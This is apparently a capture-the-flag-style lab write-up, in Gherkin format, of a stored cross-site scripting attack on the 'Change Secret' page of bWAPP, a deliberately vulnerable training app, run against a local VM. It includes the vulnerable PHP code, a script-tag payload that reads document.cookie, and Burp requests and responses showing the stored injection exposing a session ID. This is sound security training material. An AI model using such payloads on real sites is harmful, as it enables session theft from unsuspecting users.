# language: en

Feature: XSS Stored (Change Secret)
  From system bWAPP
  From the A3 - Cross Site Scripting
  With Low security level

Background:
  Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
  And I am using Firefox 52.7.3 (64-bit)
  And I am running Burp Suite Community edition v1.7.30
  Given the following in the url
  """
  URL: http://localhost/bWAPP/xss_stored_3.php
  Message: XSS Stored (Change Secret)
  Details:
        - Input text to change secret
  Objective: Perform an XSS through the secret
  """

Scenario: XSS Stored (Change Secret)
  Given the vulnerable form, I see test to see how it works
  """
  # Burp Request, xss_stored_3.php
  # We got a POST Request to change the secret for an specific user,
  # in this case, the user logged in.
  POST /bWAPP/xss_stored_3.php HTTP/1.1
  Host: 192.168.56.101

  secret=new-secret&login=bee&action=change

  # How de we know it changed?
  # By visiting this link: http://192.168.56.101/bWAPP/secret_html.php
  # Response:
  <div id="main">
    <h1>We Steal Secrets...</h1>
    <p>Your secret: <b>new-secret</b></p>
  </div>
  # So far, it's working as it is expected
  #
  # Let's take a look at source code to see if we can spot something else
  # It request for the user logged id
  86  $login = $_REQUEST["login"];
  # Escapes special characters, like NUL (ASCII 0), \n, \r, \, ', ", and
  # Control-Z, both on login and secret.
  87  $login = mysqli_real_escape_string($link, $login);
  88  $secret = mysqli_real_escape_string($link, $secret);
  89  $secret = xss($secret);
  # Updates the users secret, already escaped, so we could try to bypass
  # the code escaping and try to see if a sql injection works, but
  # this characters '<>' aren't escaped, let's try plain XSS
  90  $sql = "UPDATE users SET secret = '" . $secret . "' WHERE login \
  = '" . $login . "'";
  """
  Then I craft a string to inject
  """
  # Injection string
  <script>document.write(document.cookie)</script>
  # Encoded:
  %3Cscript%3Edocument.write%28document.cookie%29%3B%3C%2Fscript%3E
  """
  And I make a new request and tamper it's POST parameters with it
  """
  # Burp Request xss_stored_3.php
  POST /bWAPP/xss_stored_3.php HTTP/1.1
  Host: 192.168.56.101
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://192.168.56.101/bWAPP/xss_stored_3.php
  Connection: close
  Upgrade-Insecure-Requests: 1
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 99

  secret=%3Cscript%3Edocument.write%28document.cookie%29%3B%3C%2Fscript%3E&\
  login=bee&action=change

  # Response
  </br >
    <font color="green">The secret has been changed!</font>
  </div>
  # So far, the injection seems to be working as it was expected
  # Let's see if it really worked
  # Burp Request secret_html.php
  GET /bWAPP/secret_html.php HTTP/1.1
  Host: 192.168.56.101
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

  # Response
  <div id="main">
  <h1>We Steal Secrets...</h1>
  <p>Your secret: <b><script>document.write(document.cookie);</script></b></p>
  </div>

  # Rendered Response
  Your secret: security_level=0; PHPSESSID=5dddafb8a79dfc4102c0954db948ef9d

  # The injection got stored
  """
